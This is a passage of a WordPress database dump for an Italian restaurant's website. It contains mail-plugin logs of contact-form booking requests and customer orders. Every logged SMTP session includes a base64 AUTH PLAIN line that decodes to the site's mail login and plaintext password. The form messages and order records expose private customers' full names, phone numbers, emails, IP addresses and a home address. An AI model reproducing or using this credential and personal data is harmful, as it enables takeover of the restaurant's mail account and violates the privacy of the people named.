PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Windt <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: peeterwindt@gmail.com\r\nMessage-Id: <5a79e1df6ee99d2c4b914c330d4e0853@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"prenotare\"\r\nDate: Sun, 13 Sep 2020 12:52:31 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Windt <peeterwindt@gmail.com>=0ATelefono: 0031622378496=0AOggetto: p=\r\nrenotare=0A=0ACorpo del messaggio:=0Ae pessibile di prenotare per staser=\r\na verso le 8 per 4 persone?=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=\r\n=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www.ris=\r\ntorantesolymar.it)\r\n.\r\n250 OK id=1kHRUd-0005fQ-34\r\n'),(21641,1082,'solution','All good, mail sent.'),(21642,1082,'success','1'),(21643,1082,'from_header','Marco Aluigi <notifiche@ristorantesolymar.it>'),(21644,1082,'to_header','teosphone@gmail.com'),(21645,1082,'reply_to_header','marco.aluigi@meetingrimini.org'),(21646,1082,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21647,1082,'original_to','teosphone@gmail.com'),(21648,1082,'original_subject','Da sito Sol Y Mar: \"prenotazione pranzo per sabato 19 settembre 2020\"'),(21649,1082,'original_message','Da: Marco Aluigi <marco.aluigi@meetingrimini.org>\nTelefono: 3355686245\nOggetto: prenotazione pranzo per sabato 19 settembre 2020\n\nCorpo del messaggio:\nBuonasera, Vorrei prenotare per 8 persone sabato 19 Settembre ore 13.00-13.10, all\'aperto, in spiaggia. Si tratta di un pranzo aziendale. Attendo gentile conferma. Grazie, Cordialmente, Marco Aluigi, Vicedirettore Fondazione Meeting per l\'amicizia fra i popoli\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21650,1082,'original_headers','From: Marco Aluigi <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: marco.aluigi@meetingrimini.org\n'),(21651,1082,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 14 Sep 2020 12:01:33 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Marco Aluigi <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: marco.aluigi@meetingrimini.org\r\nMessage-Id: <6372fc0dd50179de68ecce9ab4e38747@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"prenotazione pranzo per sabato 19 settembre 2020\"\r\nDate: Mon, 14 Sep 2020 16:01:33 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Marco Aluigi <marco.aluigi@meetingrimini.org>=0ATelefono: 3355686245=\r\n=0AOggetto: prenotazione pranzo per sabato 19 settembre 2020=0A=0ACorpo=\r\n del messaggio:=0ABuonasera, Vorrei prenotare per 8 persone sabato 19 Se=\r\nttembre ore 13.00-13.10, all\'aperto, in spiaggia. Si tratta di un pranzo=\r\n aziendale. Attendo gentile conferma. Grazie, Cordialmente, Marco Aluigi=\r\n, Vicedirettore Fondazione Meeting per l\'amicizia fra i popoli=0A=0AAcce=\r\nttato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un modulo di conta=\r\ntto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kHqv7-0004QK-N2\r\n'),(21652,1083,'solution','All good, mail sent.'),(21653,1083,'success','1'),(21654,1083,'from_header','Michele Zanni <notifiche@ristorantesolymar.it>'),(21655,1083,'to_header','teosphone@gmail.com'),(21656,1083,'reply_to_header','mz.michele.zanni@gmail.com'),(21657,1083,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21658,1083,'original_to','teosphone@gmail.com'),(21659,1083,'original_subject','Da sito Sol Y Mar: \"Prenotazione per sabato 26\"'),(21660,1083,'original_message','Da: Michele Zanni <mz.michele.zanni@gmail.com>\nTelefono: 3391607762\nOggetto: Prenotazione per sabato 26\n\nCorpo del messaggio:\nBuonasera,\r\nvorrei prenotare un tavolo per 2 persone per sabato 26 settembre, alle ore 13.00, un tavolo esterno se possibile.\r\nGrazie mille,\r\nattendo conferma\r\nMichele Zanni\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21661,1083,'original_headers','From: Michele Zanni <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: mz.michele.zanni@gmail.com\n'),(21662,1083,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 16 Sep 2020 15:59:08 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Michele Zanni <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: mz.michele.zanni@gmail.com\r\nMessage-Id: <0ae67f6a923e246be8fe4fa59fed36c2@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione per sabato 26\"\r\nDate: Wed, 16 Sep 2020 19:59:08 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Michele Zanni <mz.michele.zanni@gmail.com>=0ATelefono: 3391607762=0A=\r\nOggetto: Prenotazione per sabato 26=0A=0ACorpo del messaggio:=0ABuonaser=\r\na,=0D=0Avorrei prenotare un tavolo per 2 persone per sabato 26 settembre=\r\n, alle ore 13.00, un tavolo esterno se possibile.=0D=0AGrazie mille,=0D=\r\n=0Aattendo conferma=0D=0AMichele Zanni=0A=0AAccettato=0A=0A--=0AQuesta e=\r\n-mail =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (https:=\r\n//www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kIda8-0001VT-I2\r\n'),(21663,1084,'solution','All good, mail sent.'),(21664,1084,'success','1'),(21665,1084,'from_header','Nicola Borelli <notifiche@ristorantesolymar.it>'),(21666,1084,'to_header','teosphone@gmail.com'),(21667,1084,'reply_to_header','nicolaborelli@icloud.com'),(21668,1084,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21669,1084,'original_to','teosphone@gmail.com'),(21670,1084,'original_subject','Da sito Sol Y Mar: \"Prenotazione\"'),(21671,1084,'original_message','Da: Nicola Borelli <nicolaborelli@icloud.com>\nTelefono: 3406224816\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno, vorrei prenotare un tavolo per 2 persone per domani sera sabato 19 settembre alle 21.00. Attendo cortese conferma\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21672,1084,'original_headers','From: Nicola Borelli <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: nicolaborelli@icloud.com\n'),(21673,1084,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 18 Sep 2020 11:05:54 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Nicola Borelli <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: nicolaborelli@icloud.com\r\nMessage-Id: <213c1ed83fdae0a07e736361b94123ae@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Prenotazione\"\r\nDate: Fri, 18 Sep 2020 15:05:54 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Nicola Borelli <nicolaborelli@icloud.com>=0ATelefono: 3406224816=0AO=\r\nggetto: Prenotazione=0A=0ACorpo del messaggio:=0ABuongiorno, vorrei pren=\r\notare un tavolo per 2 persone per domani sera sabato 19 settembre alle 2=\r\n1.00. Attendo cortese conferma=0A=0AAccettato=0A=0A--=0AQuesta e-mail=\r\n =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www=\r\n..ristorantesolymar.it)\r\n.\r\n250 OK id=1kJHxS-0002pV-WF\r\n'),(21674,1085,'solution','All good, mail sent.'),(21675,1085,'success','1'),(21676,1085,'from_header','Barbara Brandoli <notifiche@ristorantesolymar.it>'),(21677,1085,'to_header','teosphone@gmail.com'),(21678,1085,'reply_to_header','barbara@frammentidautore.it'),(21679,1085,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21680,1085,'original_to','teosphone@gmail.com'),(21681,1085,'original_subject','Da sito Sol Y Mar: \"Chiusura estiva\"'),(21682,1085,'original_message','Da: Barbara Brandoli <barbara@frammentidautore.it>\nTelefono: 3470597898\nOggetto: Chiusura estiva\n\nCorpo del messaggio:\nSalve, volevo sapere fino a quando siete aperti Per la stagione? \r\nGrazie.\r\nBarbara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21683,1085,'original_headers','From: Barbara Brandoli <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: barbara@frammentidautore.it\n'),(21684,1085,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 26 Sep 2020 05:51:20 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Barbara Brandoli <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: barbara@frammentidautore.it\r\nMessage-Id: <7d005a343d969acfdc667968b5eb1947@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Chiusura estiva\"\r\nDate: Sat, 26 Sep 2020 09:51:20 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Barbara Brandoli <barbara@frammentidautore.it>=0ATelefono: 347059789=\r\n8=0AOggetto: Chiusura estiva=0A=0ACorpo del messaggio:=0ASalve, volevo s=\r\napere fino a quando siete aperti Per la stagione? =0D=0AGrazie.=0D=0ABar=\r\nbara=0A=0AAccettato=0A=0A--=0AQuesta e-mail =C3=A8 stata inviata da un m=\r\nodulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\r\n.\r\n250 OK id=1kM6rQ-0001U7-Sg\r\n'),(21685,1110,'_edit_lock','1601153147:2'),(21686,1110,'_edit_last','2'),(21687,1110,'_wp_page_template','default'),(21688,1122,'solution','All good, mail sent.'),(21689,1122,'success','1'),(21690,1122,'from_header','Lara Guccini <notifiche@ristorantesolymar.it>'),(21691,1122,'to_header','teosphone@gmail.com'),(21692,1122,'reply_to_header','laraguccini@yahoo.it'),(21693,1122,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21694,1122,'original_to','teosphone@gmail.com'),(21695,1122,'original_subject','Da sito Sol Y Mar: \"Regalo coupon per cena 100 euro\"'),(21696,1122,'original_message','Da: Lara Guccini <laraguccini@yahoo.it>\nTelefono: 3803334875\nOggetto: Regalo coupon per cena 100 euro\n\nCorpo del messaggio:\nHo provato diverse volte all’acquisto di un buono cena ma non mi viene consentito di procedere al pagamento (Explorer, chrome), potete aiutarmi? Potrei fare bonifico? Grazie Lara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)'),(21697,1122,'original_headers','From: Lara Guccini <notifiche@ristorantesolymar.it>\nX-WPCF7-Content-Type: text/plain\nReply-To: laraguccini@yahoo.it\n'),(21698,1122,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sun, 18 Oct 2020 15:46:02 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<teosphone@gmail.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nX-WPCF7-Content-Type: text/plain\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Lara Guccini <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: teosphone@gmail.com\r\nReply-To: laraguccini@yahoo.it\r\nMessage-Id: <c3c54840724d76adaebb8f147589225b@ristorantesolymar.it>\r\nSubject: Da sito Sol Y Mar: \"Regalo coupon per cena 100 euro\"\r\nDate: Sun, 18 Oct 2020 19:46:02 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nDa: Lara Guccini <laraguccini@yahoo.it>=0ATelefono: 3803334875=0AOggetto=\r\n: Regalo coupon per cena 100 euro=0A=0ACorpo del messaggio:=0AHo provato=\r\n diverse volte all=E2=80=99acquisto di un buono cena ma non mi viene con=\r\nsentito di procedere al pagamento (Explorer, chrome), potete aiutarmi? P=\r\notrei fare bonifico? Grazie Lara=0A=0AAccettato=0A=0A--=0AQuesta e-mail=\r\n =C3=A8 stata inviata da un modulo di contatto su Sol Y Mar (https://www=\r\n..ristorantesolymar.it)\r\n.\r\n250 OK id=1kUEd0-0001R7-W7\r\n'),(21699,1124,'_order_key','wc_order_uuTQjCyONRgjB'),(21700,1124,'_customer_user','1'),(21701,1124,'_payment_method','paypal'),(21702,1124,'_payment_method_title','PayPal'),(21703,1124,'_customer_ip_address','213.209.218.243'),(21704,1124,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(21705,1124,'_created_via','checkout'),(21706,1124,'_cart_hash','ab8450559138bf357abcdd35f4a7cfd1'),(21707,1124,'_billing_first_name','Franco'),(21708,1124,'_billing_last_name','Baldisserri'),(21709,1124,'_billing_email','webmaster@baldisserri.com'),(21710,1124,'_billing_phone','3286193589'),(21711,1124,'_order_currency','EUR'),(21712,1124,'_cart_discount','0'),(21713,1124,'_cart_discount_tax','0'),(21714,1124,'_order_shipping','0.00'),(21715,1124,'_order_shipping_tax','0'),(21716,1124,'_order_tax','0'),(21717,1124,'_order_total','100.00'),(21718,1124,'_order_version','4.6.0'),(21719,1124,'_prices_include_tax','no'),(21720,1124,'_billing_address_index','Franco Baldisserri        webmaster@baldisserri.com 3286193589'),(21721,1124,'_shipping_address_index','        '),(21722,1124,'is_vat_exempt','no'),(21723,1124,'Quanti adulti?','1'),(21724,1124,'Numero bambini fino a 6 anni','0'),(21725,1124,'Numero ragazzi fino a 14 anni','0'),(21726,1124,'Numero ragazzi dai 15 anni in su','0'),(21727,1124,'Files attached','[]'),(21728,1125,'solution','All good, mail sent.'),(21729,1125,'success','1'),(21730,1125,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21731,1125,'to_header','webmaster@baldisserri.com'),(21732,1125,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21733,1125,'original_to','webmaster@baldisserri.com'),(21734,1125,'original_subject','[Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente'),(21735,1125,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Contact Form 7 versione 5.3\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(21736,1125,'original_headers',''),(21737,1125,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Wed, 21 Oct 2020 08:26:27 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <c405ca6021728bfe72d345a93f99460c@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 21 Oct 2020 12:26:27 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono s=\r\ntati aggiornati automaticamente all\'ultima versione. Non =C3=A8 richiest=\r\na da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin ora sono a=\r\nggiornati all\'ultima versione:=0A- Contact Form 7 versione 5.3=0A=0A=0AS=\r\ne hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei=\r\n forum di supporto su https://it.wordpress.org/forums/ possono riuscire=\r\n ad aiutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di=\r\n WordPress\r\n.\r\n250 OK id=1kVDCF-0005Bp-Ru\r\n'),(21738,1126,'solution','All good, mail sent.'),(21739,1126,'success','1'),(21740,1126,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21741,1126,'to_header','webmaster@baldisserri.com'),(21742,1126,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21743,1126,'original_to','webmaster@baldisserri.com'),(21744,1126,'original_subject','[Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente'),(21745,1126,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy versione 2.3.11\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(21746,1126,'original_headers',''),(21747,1126,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Thu, 22 Oct 2020 08:33:21 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nAG5vdGlmaWNoZUByaXN0b3JhbnRlc29seW1hci5pdABSb2JhbGRvMjAyMEA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <bf8d006191ee95b65be232d910d43fde@ristorantesolymar.it>\r\nSubject: [Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 22 Oct 2020 12:33:21 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono s=\r\ntati aggiornati automaticamente all\'ultima versione. Non =C3=A8 richiest=\r\na da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin ora sono a=\r\nggiornati all\'ultima versione:=0A- Cookie and Consent Solution for the G=\r\nDPR &amp; ePrivacy versione 2.3.11=0A=0A=0ASe hai problemi di qualsiasi=\r\n tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https=\r\n://it.wordpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.w=\r\nordpress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK id=1kVZmT-0007DV-Ls\r\n'),(21748,1127,'_order_key','wc_order_AZUa21iISPbrz'),(21749,1127,'_customer_user','0'),(21750,1127,'_payment_method','paypal'),(21751,1127,'_payment_method_title','PayPal'),(21752,1127,'_customer_ip_address','93.34.119.4'),(21753,1127,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0'),(21754,1127,'_created_via','checkout'),(21755,1127,'_cart_hash','b59876308cf6afedf8a81e084ee69e84'),(21756,1127,'_billing_first_name','fran co'),(21757,1127,'_billing_last_name','baldisserri'),(21758,1127,'_billing_address_1','di vittorio 31'),(21759,1127,'_billing_city','solarolo'),(21760,1127,'_billing_state','RN'),(21761,1127,'_billing_postcode','48027'),(21762,1127,'_billing_country','IT'),(21763,1127,'_billing_email','magnaromagna@gmail.com'),(21764,1127,'_billing_phone','3286193589'),(21765,1127,'_order_currency','EUR'),(21766,1127,'_cart_discount','0'),(21767,1127,'_cart_discount_tax','0'),(21768,1127,'_order_shipping','0.00'),(21769,1127,'_order_shipping_tax','0'),(21770,1127,'_order_tax','0'),(21771,1127,'_order_total','125.00'),(21772,1127,'_order_version','4.6.1'),(21773,1127,'_prices_include_tax','no'),(21774,1127,'_billing_address_index','fran co baldisserri  di vittorio 31  solarolo RN 48027 IT magnaromagna@gmail.com 3286193589'),(21775,1127,'_shipping_address_index','        